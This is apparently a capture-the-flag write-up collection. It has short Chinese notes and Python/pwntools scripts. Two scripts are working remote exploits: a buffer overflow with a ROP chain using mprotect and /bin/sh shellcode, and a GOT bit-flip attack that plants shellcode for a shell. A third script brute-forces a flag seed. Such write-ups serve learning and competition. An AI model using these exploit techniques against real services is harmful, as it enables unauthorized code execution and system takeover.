手动溢出修改success变量
写ROP链拿shell
# Exploit script for the "tictactoe" challenge (writeup: overflow a local
# variable by hand, then return into a ROP chain).
from pwn import *
# Target/tooling settings: amd64 binary, verbose pwntools logging, gdb split
# into a tmux pane if attach() is ever used.
context.arch = 'amd64'
context.log_level = "debug"
context.terminal = ['tmux', 'split', '-h']
binary = ("./tictactoe")
elf = ELF(binary, checksec=False)  # symbols (read/mprotect) are read from the local copy
r = remote("202.38.93.111", 10141)
# Absolute gadget addresses, so the binary is presumably non-PIE; the names
# suggest `pop rdi; ret` / `pop rsi; ret` / `pop rdx; ret` -- re-verify with a
# gadget finder before reusing on a different build.
pop_rdi = 0x00000000004017b6
pop_rsi = 0x0000000000407228
pop_rdx = 0x000000000043dbb5
bss = 0x4a8400  # writable scratch address: the staged input is read to, and later returned into, here
# Payload: 0x98 filler bytes (presumably up to the saved return address), then
# a chain that -- assuming the gadgets match their names -- performs
#   read(0, bss, 100)              stage up to 100 bytes from the socket
#   mprotect(0x4a8000, 0x1000, 7)  7 == PROT_READ|PROT_WRITE|PROT_EXEC on the page holding bss
# and finally returns into bss. NOTE(review): the chain relies on fixed
# addresses and on making a data page executable; PIE/ASLR or a W^X policy
# would each break it.
sh = flat([
    'a'*0x98,
    pop_rdi, 0,
    pop_rsi, bss,
    pop_rdx, 100,
    elf.sym['read'],
    pop_rdi, 0x4a8000,
    pop_rsi, 0x1000,
    pop_rdx, 7,
    elf.sym['mprotect'],
    bss
])
# The overflowing input is sent in place of a move; sendline appends '\n'.
r.sendlineafter("(0,1): ", sh)
# Four ordinary moves follow; per the writeup these drive the game to the
# point where the overwritten variable makes the function return into the
# chain -- the exact board logic is not visible here.
r.sendlineafter("(0,1): ", "(1,1)")
r.sendlineafter("(0,1): ", "(0,2)")
r.sendlineafter("(0,1): ", "(1,0)")
r.sendlineafter("(0,1): ", "(2,2)")
# Answers the staged read() with /bin/sh shellcode (must fit in the 100 bytes
# requested above), then hands the session to the user.
r.send(asm(shellcraft.sh()))
r.interactive()
见CVE。主要是mmap+MAP_FIXED可以覆盖ld的.text段,从而让ld执行shellcode
修改exit的got表1个bit,使程序流在main函数中产生循环,可以达到任意地址写的效果,然后写shellcode进行跳转。
# Exploit script for the "bitflip" challenge (writeup: flip one bit of exit's
# GOT entry so main loops, then use the resulting repeated flips as a write).
from pwn import *
# Target/tooling settings: amd64, verbose logging, gdb in a tmux split.
context.arch = 'amd64'
context.log_level = "debug"
context.terminal = ['tmux', 'split', '-h']
binary = ("./bitflip")  # not used further in this script; documents the target
r = remote("202.38.93.111", 10231)
def writeb(addr, left):
    """Send one flip request: bit *left* of the byte at *addr*.

    Waits for the service's ``flip?`` prompt and answers with
    ``"<hex address> <bit index>"``; what the service does with the request
    is defined by the remote program, not here.
    """
    request = f"{addr:#x} {left}"
    r.sendlineafter("flip?\n", request)
def writep(addr, data):
    """Request one flip for every set bit of *data*, starting at *addr*.

    *data* is consumed little-endian: byte k goes to ``addr + k``, and the
    walk stops early once no set bits remain (at most 8 bytes are visited).
    NOTE(review): assuming the service flips bits (per its ``flip?`` prompt)
    rather than storing them, the memory ends up equal to *data* only when
    the target bytes are zero beforehand.
    """
    for offset in range(8):
        byte = data & 0xFF
        for bit in range(8):
            if byte & (1 << bit):
                writeb(addr + offset, bit)
        data >>= 8
        if not data:
            return
# XOR 0x01 into the byte at 0x404039 -- per the writeup this is within exit's
# GOT entry, and the one-bit change makes control flow loop back into main so
# the flip prompt keeps coming. NOTE(review): a writable GOT is what makes this
# possible; full RELRO would leave nothing here to flip.
writep(0x404039, 1)
# /bin/sh shellcode. The loop below takes six 8-byte slices, so it assumes the
# assembled shellcode is exactly 48 bytes (u64 needs full 8-byte input) --
# TODO confirm for the pwntools version in use.
s = asm(shellcraft.sh())
# Lay the shellcode out at 0x401970, 8 bytes per writep call. writep only
# issues flips, so the bytes come out as intended only if that region is zero
# to begin with (not verifiable from this script).
for i in range(6):
    writep(0x401970 + i*8, u64(s[8*i:8*i+8]))
# XOR 0x08 into the same GOT byte, redirecting execution a second time (per the
# writeup, towards the planted shellcode).
writep(0x404039, 8)
r.interactive()
通过逆向汇编代码可知,随机因子不超过0xE40B个,复现一遍程序流程进行爆破即可。
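# Brute force of the challenge's 30-character output over every admissible
# seed. The reversed binary derives 15 32-bit values from the seed with the
# recurrence below, mixes them with TABLE1 into 15 16-bit words, and XORs the
# low bytes of those words with TABLE2 to form the output characters.
RND_INIT = 0x41C64E6D  # initial state of the recurrence
RND_INC = 0x0BC614E    # additive constant of the recurrence
SEED_LIMIT = 0xE40B    # per the writeup, the seed is below this bound

# 15 x 15 multipliers recovered from the binary (rows index the output word).
TABLE1 = [
    [0x5075, 0x4AC5, 0x724A, 0x458C, 0x7194, 0x704A, 0x613A, 0x7133, 0x6654, 0x7C59, 0x6800, 0x60C6, 0x49E4, 0x7164, 0x5DE1],
    [0x5981, 0x5B8C, 0x6496, 0x67AB, 0x5494, 0x7A40, 0x57AE, 0x407A, 0x55BD, 0x58E9, 0x760D, 0x7325, 0x73B1, 0x4071, 0x59EE],
    [0x5A8B, 0x783D, 0x5D45, 0x71F3, 0x7BB1, 0x67A6, 0x7D9F, 0x5837, 0x6B85, 0x7024, 0x79F0, 0x4306, 0x7CF4, 0x7DBE, 0x5CC3],
    [0x5318, 0x531E, 0x6097, 0x7520, 0x62D7, 0x5B95, 0x5A4F, 0x5A73, 0x66EA, 0x6715, 0x781B, 0x7114, 0x7ABA, 0x534B, 0x7C0E],
    [0x78BF, 0x4966, 0x5340, 0x620B, 0x574C, 0x6341, 0x72AD, 0x56A4, 0x5C24, 0x707A, 0x46D5, 0x6418, 0x55D4, 0x5B69, 0x60F5],
    [0x7A89, 0x6263, 0x7B1D, 0x4D80, 0x70A4, 0x513A, 0x4F0F, 0x5FCB, 0x785E, 0x5DD0, 0x4622, 0x52EB, 0x4133, 0x7652, 0x5B5F],
    [0x5002, 0x60F6, 0x7CE0, 0x77BB, 0x6D04, 0x58A2, 0x789B, 0x791B, 0x7C03, 0x4E0A, 0x638A, 0x4883, 0x75BF, 0x6C8C, 0x6822],
    [0x66B7, 0x5ACC, 0x69CE, 0x6758, 0x5EBB, 0x6FE7, 0x58FF, 0x6B44, 0x4AF3, 0x5AD4, 0x5E0E, 0x4B03, 0x668B, 0x46C1, 0x4C56],
    [0x5FD5, 0x411A, 0x5DE6, 0x7FE8, 0x6FFE, 0x76E6, 0x670B, 0x489F, 0x759D, 0x678D, 0x51D3, 0x6C30, 0x59A1, 0x6B96, 0x7D80],
    [0x6348, 0x54AB, 0x4BBD, 0x69CD, 0x72C4, 0x4EC3, 0x526E, 0x78D8, 0x788E, 0x4736, 0x5590, 0x422A, 0x40C3, 0x50A1, 0x6B9F],
    [0x58D4, 0x605A, 0x41C4, 0x5B0A, 0x6C0D, 0x678A, 0x6FCF, 0x7478, 0x4EC6, 0x72DD, 0x5DAE, 0x755E, 0x4BA5, 0x615E, 0x4A55],
    [0x7EC0, 0x449F, 0x4304, 0x48F6, 0x6FB2, 0x4D39, 0x6FD7, 0x64A9, 0x7A4D, 0x5F89, 0x77A1, 0x5541, 0x7473, 0x42D8, 0x7A8A],
    [0x6301, 0x5F0D, 0x5DC5, 0x7B76, 0x78DE, 0x53C1, 0x7787, 0x596E, 0x465F, 0x4E1A, 0x6CFD, 0x68F4, 0x55BC, 0x6BDE, 0x5B99],
    [0x5329, 0x4C84, 0x4DF3, 0x6DE5, 0x4138, 0x7B15, 0x666B, 0x4DEA, 0x6CF7, 0x7058, 0x6F83, 0x6E9B, 0x40E6, 0x6596, 0x42E9],
    [0x60C1, 0x6020, 0x4532, 0x4512, 0x4864, 0x44BD, 0x723F, 0x7075, 0x6983, 0x7491, 0x7F80, 0x4464, 0x6C0E, 0x5BFC, 0x734A],
]

# 30 XOR masks, one per output character; mask i pairs with word i % 15.
TABLE2 = [
    0x0DD, 0x0BFB6, 0x3094, 0x99FF, 0x0AC7C, 0x63B9, 0x56A3, 0x2A9A, 0x3DDF, 0x6A1D, 0x0B289, 0x0D716, 0x0E29D, 0x1BA9, 0x37E4,
    0x88, 0x0BFA8, 0x30C1, 0x99EC, 0x0AC36, 0x63B0, 0x56F7, 0x2AB1, 0x3DCA, 0x6A08, 0x0B2CE, 0x0D705, 0x0E2F1, 0x1BF4, 0x37E9,
]


def _keystream(seed: int) -> list[int]:
    """Return the 15 values the binary derives from *seed*.

    Each step is ``state = (seed * state + RND_INC) mod 2**32`` starting from
    RND_INIT; the value after each step is one element of the result.
    """
    state = RND_INIT
    values = []
    for _ in range(15):
        state = (seed * state + RND_INC) & 0xFFFFFFFF
        values.append(state)
    return values


def _flag_for_seed(seed: int) -> str:
    """Return the 30-character candidate produced by *seed*.

    Word i is the 16-bit sum over j of ``(TABLE1[i][j] * stream[j]) & 0xffff``;
    character k is ``chr((TABLE2[k] ^ word[k % 15]) & 0xff)``. Masking once
    after the sum equals masking after every addition, as the binary does.
    """
    stream = _keystream(seed)
    words = [
        sum((mult * rv) & 0xFFFF for mult, rv in zip(row, stream)) & 0xFFFF
        for row in TABLE1
    ]
    return "".join(chr((mask ^ words[k % 15]) & 0xFF) for k, mask in enumerate(TABLE2))


def main(path: str = "output") -> None:
    """Write one candidate per line, for every seed below SEED_LIMIT, to *path*.

    The file is opened in text mode exactly as the original did; candidates for
    wrong seeds may contain non-ASCII characters, so the encoding is whatever
    the locale provides.
    """
    # Context manager guarantees the file is flushed and closed even if a
    # candidate cannot be encoded.
    with open(path, "w") as out:
        out.writelines(_flag_for_seed(seed) + "\n" for seed in range(SEED_LIMIT))


if __name__ == "__main__":
    main()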